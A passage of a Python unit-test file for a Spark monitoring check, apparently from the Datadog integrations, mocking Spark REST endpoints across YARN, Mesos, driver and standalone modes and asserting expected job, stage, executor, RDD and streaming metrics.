STANDALONE_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
STANDALONE_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
STANDALONE_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
STANDALONE_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
STANDALONE_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
STANDALONE_SPARK_STREAMING_STATISTICS_URL = Url(
join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics')
)
STANDALONE_SPARK_METRICS_JSON_URL = Url(join_url_dir(SPARK_APP_URL, 'metrics/json'))
STANDALONE_SPARK_JOB_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'jobs'))
STANDALONE_SPARK_STAGE_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'stages'))
STANDALONE_SPARK_EXECUTOR_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'executors'))
STANDALONE_SPARK_RDD_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'storage/rdd'))
STANDALONE_SPARK_STREAMING_STATISTICS_URL_PRE20 = Url(
join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'streaming/statistics')
)
STANDALONE_SPARK_METRICS_JSON_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, 'metrics/json'))
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), 'fixtures')
CERTIFICATE_DIR = os.path.join(os.path.dirname(__file__), 'certificate')
def yarn_requests_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == YARN_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'yarn_apps'))
elif arg_url == YARN_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == YARN_SPARK_JOB_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == YARN_SPARK_STAGE_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == YARN_SPARK_EXECUTOR_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == YARN_SPARK_RDD_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == YARN_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == YARN_SPARK_METRICS_JSON_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def yarn_requests_auth_mock(*args, **kwargs):
# Make sure we're passing in authentication
assert 'auth' in kwargs, "Error, missing authentication"
# Make sure we've got the correct username and password
assert kwargs['auth'] == (TEST_USERNAME, TEST_PASSWORD), "Incorrect username or password"
# Return mocked request.get(...)
return yarn_requests_get_mock(*args, **kwargs)
def mesos_requests_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == MESOS_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'mesos_apps'))
elif arg_url == MESOS_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == MESOS_SPARK_JOB_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == MESOS_SPARK_STAGE_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == MESOS_SPARK_EXECUTOR_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == MESOS_SPARK_RDD_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == MESOS_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == MESOS_SPARK_METRICS_JSON_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def driver_requests_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == DRIVER_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == DRIVER_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == DRIVER_SPARK_JOB_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == DRIVER_SPARK_STAGE_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == DRIVER_SPARK_EXECUTOR_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == DRIVER_SPARK_RDD_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == DRIVER_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == DRIVER_SPARK_METRICS_JSON_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def standalone_requests_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == STANDALONE_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_standalone_apps'))
elif arg_url == STANDALONE_APP_HTML_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_standalone_app'))
elif arg_url == STANDALONE_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == STANDALONE_SPARK_JOB_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == STANDALONE_SPARK_STAGE_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == STANDALONE_SPARK_RDD_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == STANDALONE_SPARK_METRICS_JSON_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def standalone_requests_pre20_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == STANDALONE_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_standalone_apps'))
elif arg_url == STANDALONE_APP_HTML_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_standalone_app'))
elif arg_url == STANDALONE_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps_pre20'))
elif arg_url == STANDALONE_SPARK_JOB_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_STAGE_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_RDD_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_JOB_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == STANDALONE_SPARK_STAGE_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == STANDALONE_SPARK_RDD_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == VERSION_PATH:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'version'))
elif arg_url == STANDALONE_SPARK_METRICS_JSON_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def proxy_with_warning_page_mock(url, *args, **kwargs):
cookies = kwargs.get('cookies') or {}
proxy_cookie = cookies.get('proxy_cookie')
url_parts = list(urlparse(url))
query = dict(parse_qsl(url_parts[4]))
if proxy_cookie and query.get('proxyapproved') == 'true':
del query['proxyapproved']
url_parts[4] = urlencode(query)
return standalone_requests_get_mock(urlunparse(url_parts), *args[1:], **kwargs)
else:
# Display the html warning page with the redirect link
query['proxyapproved'] = 'true'
url_parts[4] = urlencode(query)
with open(os.path.join(FIXTURE_DIR, 'html_warning_page'), 'r') as f:
body = f.read().replace('$REDIRECT_URL$', urlunparse(url_parts))
return MockResponse(body, cookies={'proxy_cookie': 'foo'})
CHECK_NAME = 'spark'
YARN_CONFIG = {
'spark_url': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_yarn_mode',
'executor_level_metrics': True,
'tags': list(CUSTOM_TAGS),
}
YARN_AUTH_CONFIG = {
'spark_url': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_yarn_mode',
'executor_level_metrics': True,
'tags': list(CUSTOM_TAGS),
'username': TEST_USERNAME,
'password': TEST_PASSWORD,
}
MESOS_CONFIG = {
'spark_url': 'http://localhost:5050',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_mesos_mode',
'executor_level_metrics': True,
'tags': list(CUSTOM_TAGS),
}
MESOS_FILTERED_CONFIG = {
'spark_url': 'http://localhost:5050',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_mesos_mode',
'executor_level_metrics': True,
'spark_ui_ports': [1234],
}
DRIVER_CONFIG = {
'spark_url': 'http://localhost:4040',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_driver_mode',
'executor_level_metrics': True,
'tags': list(CUSTOM_TAGS),
}
STANDALONE_CONFIG = {
'spark_url': 'http://localhost:8080',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'executor_level_metrics': True,
}
STANDALONE_CONFIG_PRE_20 = {
'spark_url': 'http://localhost:8080',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'executor_level_metrics': True,
'spark_pre_20_mode': 'true',
}
SSL_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'executor_level_metrics': True,
}
SSL_NO_VERIFY_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'executor_level_metrics': True,
'ssl_verify': False,
}
SSL_CERT_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'ssl_verify': os.path.join(CERTIFICATE_DIR, 'cert.cert'),
'executor_level_metrics': True,
}
SPARK_JOB_RUNNING_METRIC_VALUES = {
'spark.job.count': 2,
'spark.job.num_tasks': 20,
'spark.job.num_active_tasks': 30,
'spark.job.num_completed_tasks': 40,
'spark.job.num_skipped_tasks': 50,
'spark.job.num_failed_tasks': 60,
'spark.job.num_active_stages': 70,
'spark.job.num_completed_stages': 80,
'spark.job.num_skipped_stages': 90,
'spark.job.num_failed_stages': 100,
}
SPARK_JOB_RUNNING_METRIC_TAGS = [
'status:running',
'job_id:0',
'stage_id:0',
'stage_id:1',
] + COMMON_TAGS
SPARK_JOB_SUCCEEDED_METRIC_VALUES = {
'spark.job.count': 3,
'spark.job.num_tasks': 1000,
'spark.job.num_active_tasks': 2000,
'spark.job.num_completed_tasks': 3000,
'spark.job.num_skipped_tasks': 4000,
'spark.job.num_failed_tasks': 5000,
'spark.job.num_active_stages': 6000,
'spark.job.num_completed_stages': 7000,
'spark.job.num_skipped_stages': 8000,
'spark.job.num_failed_stages': 9000,
}
SPARK_JOB_SUCCEEDED_METRIC_TAGS = [
'status:succeeded',
'job_id:0',
'stage_id:0',
'stage_id:1',
] + COMMON_TAGS
SPARK_STAGE_RUNNING_METRIC_VALUES = {
'spark.stage.count': 3,
'spark.stage.num_active_tasks': 3 * 3,
'spark.stage.num_complete_tasks': 4 * 3,
'spark.stage.num_failed_tasks': 5 * 3,
'spark.stage.executor_run_time': 6 * 3,
'spark.stage.input_bytes': 7 * 3,
'spark.stage.input_records': 8 * 3,
'spark.stage.output_bytes': 9 * 3,
'spark.stage.output_records': 10 * 3,
'spark.stage.shuffle_read_bytes': 11 * 3,
'spark.stage.shuffle_read_records': 12 * 3,
'spark.stage.shuffle_write_bytes': 13 * 3,
'spark.stage.shuffle_write_records': 14 * 3,
'spark.stage.memory_bytes_spilled': 15 * 3,
'spark.stage.disk_bytes_spilled': 16 * 3,
}
SPARK_STAGE_RUNNING_METRIC_TAGS = [
'status:running',
'stage_id:1',
] + COMMON_TAGS
SPARK_STAGE_COMPLETE_METRIC_VALUES = {
'spark.stage.count': 2,
'spark.stage.num_active_tasks': 100 * 2,
'spark.stage.num_complete_tasks': 101 * 2,
'spark.stage.num_failed_tasks': 102 * 2,
'spark.stage.executor_run_time': 103 * 2,
'spark.stage.input_bytes': 104 * 2,
'spark.stage.input_records': 105 * 2,
'spark.stage.output_bytes': 106 * 2,
'spark.stage.output_records': 107 * 2,
'spark.stage.shuffle_read_bytes': 108 * 2,
'spark.stage.shuffle_read_records': 109 * 2,
'spark.stage.shuffle_write_bytes': 110 * 2,
'spark.stage.shuffle_write_records': 111 * 2,
'spark.stage.memory_bytes_spilled': 112 * 2,
'spark.stage.disk_bytes_spilled': 113 * 2,
}
SPARK_STAGE_COMPLETE_METRIC_TAGS = [
'status:complete',
'stage_id:0',
] + COMMON_TAGS
SPARK_DRIVER_METRIC_VALUES = {
'spark.driver.rdd_blocks': 99,
'spark.driver.memory_used': 98,
'spark.driver.disk_used': 97,
'spark.driver.active_tasks': 96,
'spark.driver.failed_tasks': 95,
'spark.driver.completed_tasks': 94,
'spark.driver.total_tasks': 93,
'spark.driver.total_duration': 92,
'spark.driver.total_input_bytes': 91,
'spark.driver.total_shuffle_read': 90,
'spark.driver.total_shuffle_write': 89,
'spark.driver.max_memory': 278019440,
}
SPARK_EXECUTOR_METRIC_VALUES = {
'spark.executor.count': 2,
'spark.executor.rdd_blocks': 1,
'spark.executor.memory_used': 2,
'spark.executor.disk_used': 3,
'spark.executor.active_tasks': 4,
'spark.executor.failed_tasks': 5,
'spark.executor.completed_tasks': 6,
'spark.executor.total_tasks': 7,
'spark.executor.total_duration': 8,
'spark.executor.total_input_bytes': 9,
'spark.executor.total_shuffle_read': 10,
'spark.executor.total_shuffle_write': 11,
'spark.executor.max_memory': 555755765,
}
SPARK_EXECUTOR_LEVEL_METRIC_VALUES = {
'spark.executor.id.rdd_blocks': 1,
'spark.executor.id.memory_used': 2,
'spark.executor.id.disk_used': 3,
'spark.executor.id.active_tasks': 4,
'spark.executor.id.failed_tasks': 5,
'spark.executor.id.completed_tasks': 6,
'spark.executor.id.total_tasks': 7,
'spark.executor.id.total_duration': 8,
'spark.executor.id.total_input_bytes': 9,
'spark.executor.id.total_shuffle_read': 10,
'spark.executor.id.total_shuffle_write': 11,
'spark.executor.id.max_memory': 555755765,
}
SPARK_EXECUTOR_LEVEL_METRIC_TAGS = [
'executor_id:1',
] + COMMON_TAGS
SPARK_RDD_METRIC_VALUES = {
'spark.rdd.count': 1,
'spark.rdd.num_partitions': 2,
'spark.rdd.num_cached_partitions': 2,
'spark.rdd.memory_used': 284,
'spark.rdd.disk_used': 0,
}
SPARK_STREAMING_STATISTICS_METRIC_VALUES = {
'spark.streaming.statistics.avg_input_rate': 1.0,
'spark.streaming.statistics.avg_processing_time': 175,
'spark.streaming.statistics.avg_scheduling_delay': 8,
'spark.streaming.statistics.avg_total_delay': 183,
'spark.streaming.statistics.batch_duration': 2000,
'spark.streaming.statistics.num_active_batches': 2,
'spark.streaming.statistics.num_active_receivers': 1,
'spark.streaming.statistics.num_inactive_receivers': 3,
'spark.streaming.statistics.num_processed_records': 7,
'spark.streaming.statistics.num_received_records': 9,
'spark.streaming.statistics.num_receivers': 10,
'spark.streaming.statistics.num_retained_completed_batches': 27,
'spark.streaming.statistics.num_total_completed_batches': 28,
}
SPARK_STRUCTURED_STREAMING_METRIC_VALUES = {
'spark.structured_streaming.input_rate': 12,
'spark.structured_streaming.latency': 12,
'spark.structured_streaming.processing_rate': 12,
'spark.structured_streaming.rows_count': 12,
'spark.structured_streaming.used_bytes': 12,
}
SPARK_STRUCTURED_STREAMING_METRIC_NO_TAGS = {
'spark.structured_streaming.input_rate',
'spark.structured_streaming.latency',
}
@pytest.mark.unit
def test_yarn(aggregator, dd_run_check):
with mock.patch('requests.get', yarn_requests_get_mock):
c = SparkCheck('spark', {}, [YARN_CONFIG])
dd_run_check(c)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS + CUSTOM_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
tags = ['url:http://localhost:8088'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
for sc in aggregator.service_checks(YARN_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_auth_yarn(aggregator, dd_run_check):
with mock.patch('requests.get', yarn_requests_auth_mock):
c = SparkCheck('spark', {}, [YARN_AUTH_CONFIG])
dd_run_check(c)
tags = ['url:http://localhost:8088'] + CUSTOM_TAGS + CLUSTER_TAGS
tags.sort()
for sc in aggregator.service_checks(YARN_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
@pytest.mark.unit
def test_mesos(aggregator, dd_run_check):
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', {}, [MESOS_CONFIG])
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS + CUSTOM_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the service tests
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:5050'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:4040'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_mesos_filter(aggregator, dd_run_check):
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', {}, [MESOS_FILTERED_CONFIG])
dd_run_check(c)
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:5050'] + CLUSTER_TAGS
assert aggregator.metrics_asserted_pct == 100.0
@pytest.mark.unit
def test_driver_unit(aggregator, dd_run_check):
with mock.patch('requests.get', driver_requests_get_mock):
c = SparkCheck('spark', {}, [DRIVER_CONFIG])
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS + CUSTOM_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the service tests
for sc in aggregator.service_checks(SPARK_DRIVER_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:4040'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:4040'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_standalone_unit(aggregator, dd_run_check):
with mock.patch('requests.get', standalone_requests_get_mock):
c = SparkCheck('spark', {}, [STANDALONE_CONFIG])
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS)
# Check the executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the service tests
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080'] + CLUSTER_TAGS
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040'] + CLUSTER_TAGS
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_standalone_unit_with_proxy_warning_page(aggregator, dd_run_check):
c = SparkCheck('spark', {}, [STANDALONE_CONFIG])
with mock.patch('requests.get', proxy_with_warning_page_mock):
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
